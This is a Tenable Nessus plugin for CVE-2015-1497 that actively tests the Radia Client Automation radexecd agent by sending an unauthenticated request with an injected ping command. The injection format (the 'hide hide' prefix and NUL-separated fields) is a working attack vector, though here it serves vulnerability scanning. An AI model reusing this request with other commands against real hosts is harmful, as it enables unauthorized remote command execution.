Persistent Systems Radia Client Automation Agent Command Injection

2015-10-19T00:00:00
ID RADEXECD_CVE-2015-1497.NASL
Type nessus
Reporter Tenable
Modified 2018-07-26T00:00:00

Description

The Persistent Systems Radia Client Automation (formerly HP Client Automation) agent listening on the remote port is affected by a command execution vulnerability due to a flaw in the radexecd.exe component. An unauthenticated, remote attacker can exploit this to execute arbitrary commands in the context of the radexecd process.

                                        
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration block: identifiers, references, scoring metadata, and
# the prerequisites that gate the active check further down in this file.
if (description)
{
 script_id(86427);
 script_version("1.6");
 script_cvs_date("Date: 2018/07/26 13:32:43");

 # External references for the flaw this plugin checks for.
 script_cve_id("CVE-2015-1497");
 script_bugtraq_id(72612);
 script_xref(name:"EDB-ID", value:"36169");
 script_xref(name:"EDB-ID", value:"36206");

 script_name(english:"Persistent Systems Radia Client Automation Agent Command Injection");
 script_summary(english:"Checks for a command execution vulnerability in Persistent Systems Radia Client Automation.");

 script_set_attribute(attribute:"synopsis", value:
"The Persistent Systems Radia Client Automation agent listening on the
remote port is affected by a command injection vulnerability.");
 script_set_attribute(attribute:"description", value:
"The Persistent Systems Radia Client Automation (formerly HP Client
Automation) agent listening on the remote port is affected by a
command execution vulnerability due to a flaw in the radexecd.exe
component. An unauthenticated, remote attacker can exploit this to
execute arbitrary commands in the context of the radexecd process."); 
 # Vendor advisory; the first see_also entry below appears to be a
 # shortened link to this URL.
 # https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?56b928e5");
 script_set_attribute(attribute:"see_also", value:"http://www.zerodayinitiative.com/advisories/ZDI-15-038");
 script_set_attribute(attribute:"solution", value:
"See the vendor advisory for a possible solution.");
 # Severity scoring and exploit-availability metadata.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'HP Client Automation Command Injection');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"2015/02/10");
 script_set_attribute(attribute:"plugin_publication_date", value:"2015/10/19");

 # Both the current (Persistent Systems) and former (HP) product CPEs are
 # registered so either naming matches.
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:persistent_systems:radia_client_automation");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:client_automation_enterprise");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
 script_end_attributes();

 # ACT_ATTACK: the check below sends a crafted request to the service
 # instead of relying on version or banner information alone.
 script_category(ACT_ATTACK);
 script_family(english:"General");
 script_copyright(english:"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.");

 # Runs only after the radexecd detection and OS fingerprinting plugins and
 # only when a radexecd service was registered; skipped when the scan policy
 # restricts checks to supplied logins.
 script_dependencies("ovcm_notify_daemon_detect.nasl", "os_fingerprint.nasl");
 script_exclude_keys("global_settings/supplied_logins_only");
 script_require_keys("Services/radexecd");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("dump.inc");

# Honor the "supplied logins only" scan policy before any active probing.
if (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);

# Port of the Notify daemon (radexecd), as registered by the detection plugin.
port = get_service(svc:'radexecd', default:3465, exit_on_fail:TRUE);

# The request built below carries no valid credentials, so it is only worth
# sending when the detection plugin flagged the service as accepting
# unauthenticated requests.
noauth = get_kb_item("radexecd/" + port + "/noauth");
if (noauth != TRUE)
  exit(0, "User authentication for radexecd on port " + port + " seems to be enabled, skipping the attack.");

# Pick the command form for the target's platform.  The command itself may
# not be available on the target host, but a vulnerable server still
# answers with '\x00'.
os = get_kb_item("Host/OS");
is_windows = FALSE;
if (os && "windows" >< tolower(os)) is_windows = TRUE;

if (is_windows)
{
  probe = 'cmd.exe /c ping ' + this_host();
  payload = 'hide hide"\t"' + probe;
}
else
{
  probe = 'sh -c "ping -c 3 ' + this_host() + '"';
  payload = 'hide hide\t' + probe;
}

sock = open_sock_tcp(port);
if (!sock) audit(AUDIT_SOCK_FAIL, port);

# Notify request: return port (not significant for this check), user,
# password, then the command, each NUL-terminated.
nul = '\x00';
req = nul;
req += 'USER_' + SCRIPT_NAME + nul;
req += 'PASS_' + SCRIPT_NAME + nul;
req += payload + nul;

send(socket:sock, data:req);
res = recv(socket:sock, length:1024);
close(sock);

if (isnull(res))
  audit(AUDIT_RESP_NOT, port, "a Notify request");

# A lone NUL byte is the response of a vulnerable server; anything else is
# reported (hex-dumped) as probably not affected.
if (res != '\x00')
  exit(0, "The service listening on port " + port + ' returned the following response, and is probably not affected.\n' + hexdump(ddata:res));

security_hole(port:port);